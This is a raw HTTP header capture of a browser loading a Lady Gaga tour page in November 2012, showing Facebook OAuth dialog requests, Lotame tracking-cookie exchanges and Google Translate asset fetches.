GET /dialog/oauth?client_id=34617625687&amp;response_type=token%2Csigned_request%2Ccode&amp;display=none&amp;domain=www.ladygaga.com&amp;origin=1&amp;redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D13%23cb%3Dfceb358de9c80c%26origin%3Dhttp%253A%252F%252Fwww.ladygaga.com%252Ff297d405274a64e%26domain%3Dwww.ladygaga.com%26relation%3Dparent&amp;sdk=joey HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: hI10XjiEfKmVY1DDG5XYRS3OJAy2SJ8kkhHBZzxIprU=
Date: Mon, 05 Nov 2012 19:02:24 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /dialog/oauth?client_id=34617625687&response_type=token%2Csigned_request%2Ccode&display=none&domain=www.ladygaga.com&origin=1&redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D13%23cb%3Df20aaf0f956a0dc%26origin%3Dhttp%253A%252F%252Fwww.ladygaga.com%252Ff303d29f527c6c%26domain%3Dwww.ladygaga.com%26relation%3Dparent&sdk=joey HTTP/1.1

Host: www.facebook.com
GET /dialog/oauth?client_id=34617625687&amp;response_type=token%2Csigned_request%2Ccode&amp;display=none&amp;domain=www.ladygaga.com&amp;origin=1&amp;redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D13%23cb%3Df20aaf0f956a0dc%26origin%3Dhttp%253A%252F%252Fwww.ladygaga.com%252Ff303d29f527c6c%26domain%3Dwww.ladygaga.com%26relation%3Dparent&amp;sdk=joey HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: NTwORuZIDaDBnT85Ns1YvQiywfNxX6fhdzeu1zvEn2I=
Date: Mon, 05 Nov 2012 19:02:24 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /5/c=938/rand=106727151/pv=y/rt=ifr HTTP/1.1

Host: bcp.crwdcntrl.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 302 Found

Content-Type: text/plain; charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:24 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
X-Server: 172.25.10.124
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://bcp.crwdcntrl.net/5/ct=y/c=938/rand=106727151/pv=y/rt=ifr
Set-Cookie: cc=ctst;Path=/;Domain=.crwdcntrl.net
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
GET /dialog/oauth?client_id=34617625687&response_type=token%2Csigned_request%2Ccode&display=none&domain=www.ladygaga.com&origin=1&redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D13%23cb%3Df392309146749dc%26origin%3Dhttp%253A%252F%252Fwww.ladygaga.com%252Ff3001f3c7ebc5d2%26domain%3Dwww.ladygaga.com%26relation%3Dparent&sdk=joey HTTP/1.1

Host: www.facebook.com
GET /dialog/oauth?client_id=34617625687&amp;response_type=token%2Csigned_request%2Ccode&amp;display=none&amp;domain=www.ladygaga.com&amp;origin=1&amp;redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D13%23cb%3Df392309146749dc%26origin%3Dhttp%253A%252F%252Fwww.ladygaga.com%252Ff3001f3c7ebc5d2%26domain%3Dwww.ladygaga.com%26relation%3Dparent&amp;sdk=joey HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: SgiVnV9nDgC9DXj/kMmYyyN4twYnxnp6ofoVX4GFO1A=
Date: Mon, 05 Nov 2012 19:02:24 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /dialog/oauth?client_id=34617625687&response_type=token%2Csigned_request%2Ccode&display=none&domain=www.ladygaga.com&origin=1&redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D13%23cb%3Df1177b61300dc1a%26origin%3Dhttp%253A%252F%252Fwww.ladygaga.com%252Ff2deee88209dc72%26domain%3Dwww.ladygaga.com%26relation%3Dparent&sdk=joey HTTP/1.1

Host: www.facebook.com
GET /dialog/oauth?client_id=34617625687&amp;response_type=token%2Csigned_request%2Ccode&amp;display=none&amp;domain=www.ladygaga.com&amp;origin=1&amp;redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D13%23cb%3Df1177b61300dc1a%26origin%3Dhttp%253A%252F%252Fwww.ladygaga.com%252Ff2deee88209dc72%26domain%3Dwww.ladygaga.com%26relation%3Dparent&amp;sdk=joey HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: atZ5s6GIKnsAGMGByR46hgzMS4+tbRgpufWNPiuWdpo=
Date: Mon, 05 Nov 2012 19:02:24 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /dialog/oauth?client_id=34617625687&response_type=token%2Csigned_request%2Ccode&display=none&domain=www.ladygaga.com&origin=1&redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D13%23cb%3Df14095847d4eb6c%26origin%3Dhttp%253A%252F%252Fwww.ladygaga.com%252Ff25e72bb5ed0d8a%26domain%3Dwww.ladygaga.com%26relation%3Dparent&sdk=joey HTTP/1.1

Host: www.facebook.com
GET /dialog/oauth?client_id=34617625687&amp;response_type=token%2Csigned_request%2Ccode&amp;display=none&amp;domain=www.ladygaga.com&amp;origin=1&amp;redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D13%23cb%3Df14095847d4eb6c%26origin%3Dhttp%253A%252F%252Fwww.ladygaga.com%252Ff25e72bb5ed0d8a%26domain%3Dwww.ladygaga.com%26relation%3Dparent&amp;sdk=joey HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: x5MJfs9t8FiSJCr2y/C9veXijkQLqt7kwfl07ed1iyg=
Date: Mon, 05 Nov 2012 19:02:24 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /dialog/oauth?client_id=34617625687&response_type=token%2Csigned_request%2Ccode&display=none&domain=www.ladygaga.com&origin=1&redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D13%23cb%3Df2bade7e4d450f2%26origin%3Dhttp%253A%252F%252Fwww.ladygaga.com%252Ff1dae3e34c04f0e%26domain%3Dwww.ladygaga.com%26relation%3Dparent&sdk=joey HTTP/1.1

Host: www.facebook.com
GET /dialog/oauth?client_id=34617625687&amp;response_type=token%2Csigned_request%2Ccode&amp;display=none&amp;domain=www.ladygaga.com&amp;origin=1&amp;redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D13%23cb%3Df2bade7e4d450f2%26origin%3Dhttp%253A%252F%252Fwww.ladygaga.com%252Ff1dae3e34c04f0e%26domain%3Dwww.ladygaga.com%26relation%3Dparent&amp;sdk=joey HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: flzpKYHW/vyHduAOap1R2AJJzqNb+9bsuRoc+bgggFA=
Date: Mon, 05 Nov 2012 19:02:24 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /5/c=938/rand=805532569/pv=y/rt=ifr HTTP/1.1

Host: bcp.crwdcntrl.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 302 Found

Content-Type: text/plain; charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:25 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
X-Server: 172.25.10.122
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://bcp.crwdcntrl.net/5/ct=y/c=938/rand=805532569/pv=y/rt=ifr
Set-Cookie: cc=ctst;Path=/;Domain=.crwdcntrl.net
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
GET /5/ct=y/c=938/rand=106727151/pv=y/rt=ifr HTTP/1.1

Host: bcp.crwdcntrl.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: cc=ctst
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:25 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
X-Server: 172.25.10.118
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: dc=1;Path=/;Domain=.crwdcntrl.net aud=&quot;ABR4nGNgYGAImMHryMDAaHXx83E9Bg4GBq9VDCDgehBCHQNTlg0Q3hwwpVgN4a2EUIwNDA0A214Log%3D%3D&quot;;Version=1;Path=/;Domain=.crwdcntrl.net;Expires=Fri, 02-Aug-2013 19:02:25 GMT;Max-Age=23328000 OAID=3017ef643c8c5763c2137cefd776552e;Path=/;Domain=.crwdcntrl.net;Expires=Fri, 02-Aug-2013 19:02:25 GMT cc=&quot;ACN4nGNQMDYwNE9NMzMxTrZINjU3M042MjQ2T05NSzE3NzM1NUplAIKAGbyODGDAaHXx83E9MFO4d5oTEwNbDgPDf0ZGBuZVQJqBEQgZGAV%2B1sEkGKASDGCJZmVJ7BK9s2ZiN6pBUBmHUVJGOIzasA2XjjzsEgLfDuGQ%2BBmNw6ifOjgsP92L3R%2FNP%2FVw6NikiktCDZflptglUnzn4dDB04RDgu0rdgkGPu6EXZg%2B4U7YiSk4UUcBymEEcZYhcwqROVsQHGWuN5gGcT65jSnYLngYU7Bg0TlMQad%2FizAFZerUMQX5qgSxWfQaUxAAN%2BGbHw%3D%3D&quot;;Version=1;Path=/;Domain=.crwdcntrl.net;Expires=Fri, 02-Aug-2013 19:02:25 GMT;Max-Age=23328000
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 343
GET /5/c=938/rand=134828210/pv=y/rt=ifr HTTP/1.1

Host: bcp.crwdcntrl.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: cc=ctst
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:25 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
X-Server: 172.25.10.69
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: dc=1;Path=/;Domain=.crwdcntrl.net aud=&quot;ABR4nGNgYGAImMHryMDAaHXx87HXDBwMDF6rGEDA9SCEOgamLBsgvDlgSrEawlsJoRgbGBoABsAMXg%3D%3D&quot;;Version=1;Path=/;Domain=.crwdcntrl.net;Expires=Fri, 02-Aug-2013 19:02:25 GMT;Max-Age=23328000 OAID=3017ef643c8c5763c2137cefd776552e;Path=/;Domain=.crwdcntrl.net;Expires=Fri, 02-Aug-2013 19:02:25 GMT cc=&quot;ACN4nGNQMDYwNE9NMzMxTrZINjU3M042MjQ2T05NSzE3NzM1NUplAIKAGbyODGDAaHXx87HXYKZw7zQnJga2HAaG%2F4yMDMyrgDQDIxAyMAr8rINJMEAlGMASzcqS2CV6Z83EblSDoDIOo6SMcBi1YRsuHXnYJQS%2BHcIh8TMah1E%2FdXBYfroXuz%2Baf%2Brh0LFJFZeEGi7LTbFLpPjOw6GDpwmHBNtX7BIMfNwJuzB9wp2wE1Nwoo4ClMMI4ixD5hQic7YgOMpcbzAN4nxyG1OwXfAwpmDBonOYgk7%2FFmEKytSpYwryVQlis%2Bg1piAAW9ab2w%3D%3D&quot;;Version=1;Path=/;Domain=.crwdcntrl.net;Expires=Fri, 02-Aug-2013 19:02:25 GMT;Max-Age=23328000
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 340
GET /5/c=938/rand=457112580/pv=y/rt=ifr HTTP/1.1

Host: bcp.crwdcntrl.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: cc=ctst
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:25 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
X-Server: 172.25.10.71
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: dc=1;Path=/;Domain=.crwdcntrl.net aud=&quot;ABR4nGNgYGAImMHryMDAaHXx83FXBg4GBq9VDCDgehBCHQNTlg0Q3hwwpVgN4a2EUIwNDA0A4KsLuQ%3D%3D&quot;;Version=1;Path=/;Domain=.crwdcntrl.net;Expires=Fri, 02-Aug-2013 19:02:25 GMT;Max-Age=23328000 OAID=3017ef643c8c5763c2137cefd776552e;Path=/;Domain=.crwdcntrl.net;Expires=Fri, 02-Aug-2013 19:02:25 GMT cc=&quot;ACN4nGNQMDYwNE9NMzMxTrZINjU3M042MjQ2T05NSzE3NzM1NUplAIKAGbyODGDAaHXx83FXMFO4d5oTEwNbDgPDf0ZGBuZVQJqBEQgZGAV%2B1sEkGKASDGCJZmVJ7BK9s2ZiN6pBUBmHUVJGOIzasA2XjjzsEgLfDuGQ%2BBmNw6ifOjgsP92L3R%2FNP%2FVw6NikiktCDZflptglUnzn4dDB04RDgu0rdgkGPu6EXZg%2B4U7YiSk4UUcBymEEcZYhcwqROVsQHGWuN5gGcT65jSnYLngYU7Bg0TlMQad%2FizAFZerUMQX5qgSxWfQaUxAAeuebNg%3D%3D&quot;;Version=1;Path=/;Domain=.crwdcntrl.net;Expires=Fri, 02-Aug-2013 19:02:25 GMT;Max-Age=23328000
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 340
GET /5/c=938/rand=572810405/pv=y/rt=ifr HTTP/1.1

Host: bcp.crwdcntrl.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: cc=ctst
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:25 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
X-Server: 172.25.10.120
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: dc=1;Path=/;Domain=.crwdcntrl.net aud=&quot;ABR4nGNgYGAImMHryMDAaHXx8%2FFiBg4GBq9VDCDgehBCHQNTlg0Q3hwwpVgN4a2EUIwNDA0A60UL5w%3D%3D&quot;;Version=1;Path=/;Domain=.crwdcntrl.net;Expires=Fri, 02-Aug-2013 19:02:25 GMT;Max-Age=23328000 OAID=3017ef643c8c5763c2137cefd776552e;Path=/;Domain=.crwdcntrl.net;Expires=Fri, 02-Aug-2013 19:02:25 GMT cc=&quot;ACN4nGNQMDYwNE9NMzMxTrZINjU3M042MjQ2T05NSzE3NzM1NUplAIKAGbyODGDAaHXx8%2FFiMFO4d5oTEwNbDgPDf0ZGBuZVQJqBEQgZGAV%2B1sEkGKASDGCJZmVJ7BK9s2ZiN6pBUBmHUVJGOIzasA2XjjzsEgLfDuGQ%2BBmNw6ifOjgsP92L3R%2FNP%2FVw6NikiktCDZflptglUnzn4dDB04RDgu0rdgkGPu6EXZg%2B4U7YiSk4UUcBymEEcZYhcwqROVsQHGWuN5gGcT65jSnYLngYU7Bg0TlMQad%2FizAFZerUMQX5qgSxWfQaUxAAAQKbZA%3D%3D&quot;;Version=1;Path=/;Domain=.crwdcntrl.net;Expires=Fri, 02-Aug-2013 19:02:25 GMT;Max-Age=23328000
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 343
GET /images/icons/product/translate-32.png HTTP/1.1

Host: www.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Mon, 02 Apr 2012 02:13:37 GMT
Date: Mon, 05 Nov 2012 19:02:25 GMT
Expires: Mon, 05 Nov 2012 19:02:25 GMT
Cache-Control: private, max-age=31536000
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 1464
X-XSS-Protection: 1; mode=block
GET /5/c=938/rand=983915993/pv=y/rt=ifr HTTP/1.1

Host: bcp.crwdcntrl.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: cc=ctst
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:25 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
X-Server: 172.25.10.82
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: dc=1;Path=/;Domain=.crwdcntrl.net aud=&quot;ABR4nGNgYGAImMHryMDAaHXx83E2Bg4GBq9VDCDgehBCHQNTlg0Q3hwwpVgN4a2EUIwNDA0A0iYLeg%3D%3D&quot;;Version=1;Path=/;Domain=.crwdcntrl.net;Expires=Fri, 02-Aug-2013 19:02:25 GMT;Max-Age=23328000 OAID=3017ef643c8c5763c2137cefd776552e;Path=/;Domain=.crwdcntrl.net;Expires=Fri, 02-Aug-2013 19:02:25 GMT cc=&quot;ACN4nGNQMDYwNE9NMzMxTrZINjU3M042MjQ2T05NSzE3NzM1NUplAIKAGbyODGDAaHXx83E2MFO4d5oTEwNbDgPDf0ZGBuZVQJqBEQgZGAV%2B1sEkGKASDGCJZmVJ7BK9s2ZiN6pBUBmHUVJGOIzasA2XjjzsEgLfDuGQ%2BBmNw6ifOjgsP92L3R%2FNP%2FVw6NikiktCDZflptglUnzn4dDB04RDgu0rdgkGPu6EXZg%2B4U7YiSk4UUcBymEEcZYhcwqROVsQHGWuN5gGcT65jSnYLngYU7Bg0TlMQad%2FizAFZerUMQX5qgSxWfQaUxAAw0Ka9w%3D%3D&quot;;Version=1;Path=/;Domain=.crwdcntrl.net;Expires=Fri, 02-Aug-2013 19:02:25 GMT;Max-Age=23328000
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 343
GET /translate_static/js/element/hrs.swf HTTP/1.1

Host: translate.googleapis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Last-Modified: Mon, 02 Apr 2012 00:13:23 GMT
Date: Mon, 05 Nov 2012 18:43:40 GMT
Expires: Mon, 05 Nov 2012 19:43:40 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 4689
X-XSS-Protection: 1; mode=block
Age: 1125
Cache-Control: public, max-age=3600
GET /5/ct=y/c=938/rand=805532569/pv=y/rt=ifr HTTP/1.1

Host: bcp.crwdcntrl.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: cc=ctst
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:25 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
X-Server: 172.25.10.70
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: dc=1;Path=/;Domain=.crwdcntrl.net aud=&quot;ABR4nGNgYGAImMHryMDAaHXx80luBg4GBq9VDCDgehBCHQNTlg0Q3hwItRJMKVZDeIwNDA0A1gMLgQ%3D%3D&quot;;Version=1;Path=/;Domain=.crwdcntrl.net;Expires=Fri, 02-Aug-2013 19:02:25 GMT;Max-Age=23328000 OAID=3017ef643c8c5763c2137cefd776552e;Path=/;Domain=.crwdcntrl.net;Expires=Fri, 02-Aug-2013 19:02:25 GMT cc=&quot;ACN4nGNQMDYwNE9NMzMxTrZINjU3M042MjQ2T05NSzE3NzM1NUplAIKAGbyODGDAaHXx80luMFO4WVmSiYEth4HhPyMDA%2FMqIA1SwMDAJPCzDrtE7zQnmAQjVIIRIjFrJnaJBkFl7EY1SxnhsGPDNlw68nA499shXP6IxmHUTx0clp%2Fuxe6P5p96OHRsUsUloYbLclPsEim%2B83Do4GnCIcH2FbsEAx93wi5Mn3An7MQUnKijAOUwgjjLkDmFyJwtCI4y1xtMgzif3MYUbBc8jClYsOgcpqDTv0WYgjJ16piCfFWC2Cx6jSkIANs4mxE%3D&quot;;Version=1;Path=/;Domain=.crwdcntrl.net;Expires=Fri, 02-Aug-2013 19:02:25 GMT;Max-Age=23328000
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 260
GET /px?Yz0xNjQ0JnB4aWQ9MjY5MTgsMjY4NDQsMjY5MjgsMjY4NzA%3D HTTP/1.1

Host: bcp.crwdcntrl.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/5/ct=y/c=938/rand=106727151/pv=y/rt=ifr
